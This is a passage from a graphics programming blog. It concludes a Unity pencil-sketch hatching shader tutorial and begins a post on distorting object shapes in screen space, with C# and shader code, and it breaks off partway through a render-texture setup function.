<p>Altogether, the hatching function looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed3</span> <span class="nf">Hatching</span><span class="p">(</span><span class="n">float2</span> <span class="n">_uv</span><span class="p">,</span> <span class="n">half</span> <span class="n">_intensity</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">half3</span> <span class="n">hatch0</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_Hatch0</span><span class="p">,</span> <span class="n">_uv</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">hatch1</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_Hatch1</span><span class="p">,</span> <span class="n">_uv</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">overbright</span> <span class="p">=</span> <span class="nf">max</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="n">_intensity</span> <span class="p">-</span> <span class="m">1.0</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">weightsA</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">((</span><span class="n">_intensity</span> <span class="p">*</span> <span class="m">6.0</span><span class="p">)</span> <span class="p">+</span> <span class="nf">half3</span><span class="p">(-</span><span class="m">0</span><span class="p">,</span> <span class="p">-</span><span class="m">1</span><span class="p">,</span> <span class="p">-</span><span class="m">2</span><span class="p">));</span>
<span class="n">half3</span> <span class="n">weightsB</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">((</span><span class="n">_intensity</span> <span class="p">*</span> <span class="m">6.0</span><span class="p">)</span> <span class="p">+</span> <span class="nf">half3</span><span class="p">(-</span><span class="m">3</span><span class="p">,</span> <span class="p">-</span><span class="m">4</span><span class="p">,</span> <span class="p">-</span><span class="m">5</span><span class="p">));</span>
<span class="n">weightsA</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span>
<span class="n">weightsA</span><span class="p">.</span><span class="n">z</span> <span class="p">-=</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">weightsB</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span>
<span class="n">hatch0</span> <span class="p">=</span> <span class="n">hatch0</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">;</span>
<span class="n">hatch1</span> <span class="p">=</span> <span class="n">hatch1</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="n">overbright</span> <span class="p">+</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span>
<span class="n">hatch0</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">b</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">b</span><span class="p">;</span>
<span class="k">return</span> <span class="n">hatching</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we plug that into our pixel shader like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">color</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed3</span> <span class="n">diffuse</span> <span class="p">=</span> <span class="n">color</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="nf">dot</span><span class="p">(</span><span class="n">_WorldSpaceLightPos0</span><span class="p">,</span> <span class="nf">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">nrm</span><span class="p">));</span>
<span class="k">fixed</span> <span class="n">intensity</span> <span class="p">=</span> <span class="nf">dot</span><span class="p">(</span><span class="n">diffuse</span><span class="p">,</span> <span class="nf">fixed3</span><span class="p">(</span><span class="m">0.2326</span><span class="p">,</span> <span class="m">0.7152</span><span class="p">,</span> <span class="m">0.0722</span><span class="p">));</span>
<span class="n">color</span><span class="p">.</span><span class="n">rgb</span> <span class="p">=</span> <span class="nf">Hatching</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">*</span> <span class="m">8</span><span class="p">,</span> <span class="n">intensity</span><span class="p">);</span>
<span class="k">return</span> <span class="n">color</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We end up with a lovely hatch material:</p>
<p>Last thing to note here is that I’m multiplying the input UVs by 8 when I pass them to the hatch function. This is purely a hack because I think it looks better with the hatch textures I’m using. YMMV, especially if you’re generating your own TAM.</p>
<h2 id="a-post-processing-effect">A Post Processing Effect</h2>
<p>So now that we have the basic effect, it’s time to do something more exciting with it. Moving this to a post effect makes it much easier to use in a project, and do fun things like integrate with other effects, like a vignette:</p>
<p>But for now, I’m just going to walk through turning this into a plain old full screen sketch effect:</p>
<p>This is surprisingly straightforward. We’re already rendering the entire scene with lighting in our main pass, which means that we can pull our intensity value from there. This has the advantage of letting us sketchify scenes using complicated materials or Unity’s dynamic GI without us having to think about anything. Other than that, about the only thing we need is the UVs of the objects we’re shading.</p>
<p>But as is usually the case with graphics, we need to do a bit of setup first:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="p">[</span><span class="nf">RequireComponent</span><span class="p">(</span><span class="k">typeof</span><span class="p">(</span><span class="n">Camera</span><span class="p">))]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">PencilSketchPostEffect</span> <span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">bufferScale</span> <span class="p">=</span> <span class="m">1.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Shader</span> <span class="n">uvReplacementShader</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Material</span> <span class="n">compositeMat</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledWidth</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledHeight</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Camera</span> <span class="n">effectCamera</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">Application</span><span class="p">.</span><span class="n">targetFrameRate</span> <span class="p">=</span> <span class="m">120</span><span class="p">;</span>
<span class="n">mainCam</span> <span class="p">=</span> <span class="n">GetComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="n">effectCamera</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">GameObject</span><span class="p">().</span><span class="n">AddComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">bufferScale</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">bufferScale</span><span class="p">,</span> <span class="m">0.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">scaledWidth</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span> <span class="p">*</span> <span class="n">bufferScale</span><span class="p">);</span>
<span class="n">scaledHeight</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span> <span class="p">*</span> <span class="n">bufferScale</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re familiar with my previous posts, this should look very familiar. All we’re doing is setting up our effect to use a second camera, and updating some variables to scale any buffers we need to create. Simple stuff. The fun starts inside OnRenderImage:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="nf">CopyFrom</span><span class="p">(</span><span class="n">mainCam</span><span class="p">);</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="c1">//redner scene into a UV buffer</span>
<span class="n">RenderTexture</span> <span class="n">uvBuffer</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">ARGBFloat</span><span class="p">);</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="nf">SetTargetBuffers</span><span class="p">(</span><span class="n">uvBuffer</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">uvBuffer</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="nf">RenderWithShader</span><span class="p">(</span><span class="n">uvReplacementShader</span><span class="p">,</span> <span class="s">""</span><span class="p">);</span>
<span class="n">compositeMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_UVBuffer"</span><span class="p">,</span> <span class="n">uvBuffer</span><span class="p">);</span>
<span class="c1">//Composite pass with packed TAMs</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">compositeMat</span><span class="p">);</span>
<span class="n">RenderTexture</span><span class="p">.</span><span class="nf">ReleaseTemporary</span><span class="p">(</span><span class="n">uvBuffer</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Again, mostly, this is all the same as previous effects. We copy the settings we need from the main camera to the effect camera, create our temporary buffer to render UVs into, and then render the scene UVs.</p>
<p>Once we have our UV buffer populated, we pass it to our composite shader, which does the rest of the work.</p>
<p>It’s very easy to make a mistake when rendering the UV buffer. With UVs, we need much more precision than we can store in a default RT texel. Remember earlier when I was talking about needing to store the luminosity constant in a half3 because a fixed3 didn’t have enough precision? That goes double for UVs. If you forget about this and try output your UVs to a regular buffer, you end up with a mess:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/hatchbadprecision.PNG" />
<font size="2">Wrong Precision Left, Correct Precision Right</font><br /><br />
</div>
<p>Since we’re going to use a floating point buffer, that means that our fragment shader needs to return a float, so our UV replacement shader looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="p">=</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">;</span>
<span class="k">return</span> <span class="nf">float4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">y</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>I’m also taking the time here to output the tiling and offset info from the main texture so that we can use it later to (hopefully) get a more accurate effect.</p>
<p>Finally, the composite shader is very simple, now that you know what the hatching function is:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">uv</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_UVBuffer</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uvFlipY</span><span class="p">);</span>
<span class="n">half</span> <span class="n">intensity</span> <span class="p">=</span> <span class="nf">dot</span><span class="p">(</span><span class="n">col</span><span class="p">.</span><span class="n">rgb</span><span class="p">,</span> <span class="nf">float3</span><span class="p">(</span><span class="m">0.2326</span><span class="p">,</span> <span class="m">0.7152</span><span class="p">,</span> <span class="m">0.0722</span><span class="p">));</span>
<span class="n">half3</span> <span class="n">hatch</span> <span class="p">=</span> <span class="nf">Hatching</span><span class="p">(</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="p">*</span> <span class="m">8</span><span class="p">,</span> <span class="n">intensity</span><span class="p">);</span>
<span class="n">col</span><span class="p">.</span><span class="n">rgb</span> <span class="p">=</span> <span class="n">hatch</span><span class="p">;</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Speaking of precision though, you’ll notice that using the above code, the hack we used earlier to have very bright objects go to white no longer works, this is again because of buffer precision: the buffer that our main camera is rendering to only stores values up to 1.0, so that extra information is getting clipped before it gets to us. You can certainly make it happen - you’ll need the main camera rendering into a high precision buffer, and you’ll need the shaders on individual elements to output halfs or floats - but this violates our principle of not requiring changes to the shaders objects are using, therefore I’m calling it outside the scope of this post.</p>
<h2 id="performance">Performance</h2>
<p>On an iPhone 6, rendering the scene you see in the gif at the beginning of the post with a htaching shader on each robot was blazing fast (almost exactly the speed that rendering them with a diffuse shader was). However, turning on the post effect added 4 ms to the render time. This is likely due to the fact that we’re performing 4 texture lookups (main cam, uv buffer, 2 hatch textures) and a not insignificant amount of math inside the composite shader (which operates at full res).</p>
<p>I didn’t do any performance testing on desktop, mostly because after working in mobile for half a decade, it’s just easier for me to grab the numbers off of a phone. My gut says that anything a phone can do in 4 ms, my laptops can do in basically no time, but I’m basing that on basically nothing but a hunch.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Firstly, all the code that I talked about is available <a href="https://github.com/khalladay/PencilSketchEffect">on github</a>. It’s GPL’ed because to the best of my knowledge, the hatch images I found were released under the GPL.</p>
<p>There are lots of potential issues you’ll run into with this effect if you use it in a real project. For example, handling non uniform object scale can present some odd issues, especially if you don’t want to break static batching by passing scale to the object’s material. I think you could get around this by encoding the scale of objects into their vertex color, but if you know the scale of your object at bake time, you should probably just resize your mesh.</p>
<p>In reality though, the effect as presented here is likely not going to make your art team very happy. I think you’d likely run into artists wanting to author custom TAMs with different types of strokes, and maps for each object to control which type of stroke was used where.</p>
<p>That about wraps things up, this was a lot of fun! If you have any questions, shoot me a message <a href="https://twitter.com/khalladay">on twitter</a>, I’d love to see more projects using this type of effect, so send me screenshots of anything you build with it!</p>
<p>[Update: 5/18/2020: Thanks to @__seb for pointing out a typo in the hatching shader]</p>
Distorting Object Shapes in Screen Space2017-02-06T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/02/06/ObjectShapeDistortion<p>Today I’m going to walk through a different take on the distortion effect that I presented awhile ago in the post <a href="http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion.html">“Screen Space Distortion and a Sci-fi Shield Effect.”</a> This time, instead of using distortion to see “through” an object, we are going to distort the shape of objects themselves. When it’s all done, it’s going to look something like this:</p>
<div align="center">
<img src="/images/post_images/2017-02-05/distortinggif.gif" style="width:360px; height:279px" /><br />
</div>
<p>Pretty snazzy right? The tricky part of the effect isn’t the distortion, it’s in getting the edges of the distorted objects to sort “correctly”. Or…as correctly as the edge of an object distorted in screen space can.</p>
<p>All of this was done using Unity 5.5.x, so if you’ve arrived here from the future and are using a different version, you may have to tweak what I present here.</p>
<h3>A High Level View of the Effect</h3>
<p>Before we dive into the implementation details, here’s a quick outline of what we’re going to do to make this effect work:</p>
<ul>
<li>Render all the non distorting objects into our main RenderTexture</li>
<li>Blit the RGB channels of that buffer into a lower res RT</li>
<li>Render the distorting objects (undistorted) into the lower res RT using a custom shader</li>
<li>Combine all of these buffers together to make the effect</li>
</ul>
<p>Sounds fun right? Let’s get started.</p>
<h3>Some Initial Set Up</h3>
<p>The entire c# part of the effect is going to live on a single script that we’ll attach to the main camera, which we’ll get set up here.</p>
<p>I implemented this with two cameras, mostly so that I didn’t have to touch culling masks / settings on the main scene camera, which we use to get the color buffer that doesn’t have distorted objects in it. The script will create the second camera is the one we use to render the distorting objects.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="n">Camera</span> <span class="n">cam</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Camera</span> <span class="n">maskCam</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Material</span> <span class="n">compositeMat</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Material</span> <span class="n">stripAlphaMat</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">speed</span> <span class="p">=</span> <span class="m">1.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">scaleFactor</span> <span class="p">=</span> <span class="m">1.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">magnitude</span> <span class="p">=</span> <span class="m">0.01f</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledWidth</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledHeight</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">cam</span> <span class="p">=</span> <span class="n">GetComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="n">scaledWidth</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">scaledHeight</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">cam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="p">=</span> <span class="p">~(</span><span class="m">1</span> <span class="p"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="nf">NameToLayer</span><span class="p">(</span><span class="s">"Distortion"</span><span class="p">));</span>
<span class="n">cam</span><span class="p">.</span><span class="n">depthTextureMode</span> <span class="p">=</span> <span class="n">DepthTextureMode</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">maskCam</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">GameObject</span><span class="p">(</span><span class="s">"Distort Mask Cam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">enabled</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="p">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Nothing</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>There are a few things to note here: First, we need to determine how big we want our distorted color buffer to be, so I’m mutliply the screen size by a float. This is important for optimizing the effect for low power devices. The smaller our second buffer is, the faster the effect will be, and the less memory it will use.</p>
<p>The other important thing to note is that I’m setting the depthTextureMode on the main camera. This is so that the camera will output a depth texture that we can see in our shaders, which we’re going to use to help us sort our distorting object later on.</p>
<p>The other boring bit I want to get out of the way is the update function:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">scaleFactor</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">scaleFactor</span><span class="p">,</span> <span class="m">0.01f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">scaledWidth</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">scaledHeight</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">magnitude</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Max</span><span class="p">(</span><span class="m">0.0f</span><span class="p">,</span> <span class="n">magnitude</span><span class="p">);</span>
<span class="n">Shader</span><span class="p">.</span><span class="nf">SetGlobalFloat</span><span class="p">(</span><span class="s">"_DistortionOffset"</span><span class="p">,</span> <span class="p">-</span><span class="n">Time</span><span class="p">.</span><span class="n">time</span> <span class="p">*</span> <span class="n">speed</span><span class="p">);</span>
<span class="n">Shader</span><span class="p">.</span><span class="nf">SetGlobalFloat</span><span class="p">(</span><span class="s">"_DistortionAmount"</span><span class="p">,</span> <span class="n">magnitude</span><span class="p">/</span><span class="m">100.0f</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Nothing really special here, we’re updating a bunch of values per frame so we can do things like change the scaling value at runtime, and we need to set a few shader parameters in order to update the distortion effect.</p>
<p>The rest of the logic for the effect is going to take place inside OnRenderImage:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//cool stuff goes here :)</span>
<span class="p">}</span></code></pre></figure>
<p>If you attach this to your main camera and hit play right now, you’ll see a lovely abyss of black fill your screen. Stare into it for a moment before continuing below.</p>
<div align="center">
<img src="/images/post_images/2017-02-05/black.png" style="width:300; height:350" /><br />
</div>
<h3>Rendering the DistortionRT</h3>
<p>As mentioned above, the first thing we need to do in our OnRenderImage function is to get our RenderTextures filled with some colour (and depth!). Since we’re working in OnRenderImage, we already have the main camera’s output in RT form (the src argument in the function signature), but we need to get our low res colour buffer built up.</p>
<div style="background-color:#AAEEAA; border-style:solid; border-width:1px">In the interest of simplicity, I'm going to refer to our low res RenderTexture as the "distortingRT," because we are going to render the things we want to distort into it.
</div>
<p><br /></p>
<p>Before we render our distorting objects however, we need to copy the contents of main RT’s RGB channels into the distortingRT. This will help eliminate ugly artifacts around the edges of our wobbly GameObjects which get caused because we’re using a lower resolution image to grab their colours from. This artifact ends up looking like this:</p>
<div align="center">
<img src="/images/post_images/2017-02-05/lowresartifact.PNG" /><br />
</div>
<p>We also need to output a specific constant into the alpha channel of the distortingRT. We are going to be using the alpha channel as a low resolution depth buffer to let us sort our distorting objects with the ones seen by the main camera, but before we do that, we need a clean slate to work with, so we need to fill the alpha channel of distortingRT with a value that represents the farthest depth possible (the far clip plane).</p>
<p>This is simple, but only if you’re aware of how different platforms handle depth. On some platforms (DX11/12 and Metal for example), the depth buffer goes from 1 to 0, with 1 (or white) being the closest objects, and 0 being the edge of the far plane. Other platforms (like OpenGL) go from 0 to 1. We need our shader to output the farthest depth value possible for anywhere that doesn’t contain a distorting object, so we need to output different values per platform.</p>
<p>Luckily, Unity has a handy preprocessor define to let us know which platform we’re using:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="cp">#if UNITY_REVERSED_Z
</span> <span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="m">0.0</span><span class="p">;</span>
<span class="cp">#else
</span> <span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="m">1.0</span><span class="p">;</span>
<span class="cp">#endif
</span> <span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you aren’t familiar enough with image effect shaders to use the above snippet, the entire source for this article can be found <a href="https://github.com/khalladay/SinewaveShapeDistortion">here</a>, but as the rest is mostly boiler plate, I’m not going to include it here.</p>
<p>With our shader built, we can use that to copy what we need from one buffer to the other:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">distortingRT</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">,</span> <span class="n">stripAlphaMat</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>You’ll notice that instead of allocating the distortingRT earlier, we’re grabbing it here using RenderTexture.GetTemporary. The Unity docs have this to say:</p>
<blockquote>
<p>If you are doing a series of post-processing “blits”, it’s best for performance to get and >release a temporary render texture for each blit, instead of getting one or two render >textures upfront and reusing them.</p>
</blockquote>
<p>So that’s what we’ll do! We just have to remember to release the texture at the end of the function, otherwise we’re going to allocate a lot of RTs very quickly.</p>
<h3>Rendering the Distorting Objects</h3>
<p>Next we need to render the things we want to distort into the distortingRT. There’s not really much special about doing this, except that I make sure to re-set up my camera parameters every frame so that other scripts can’t accidentally mess up our rendering.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">distortingRT</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">ARGBFloat</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">,</span> <span class="n">stripAlphaMat</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">CopyFrom</span><span class="p">(</span><span class="n">cam</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="p">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="p">=</span> <span class="m">1</span> <span class="p"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="nf">NameToLayer</span><span class="p">(</span><span class="s">"Distortion"</span><span class="p">);</span>
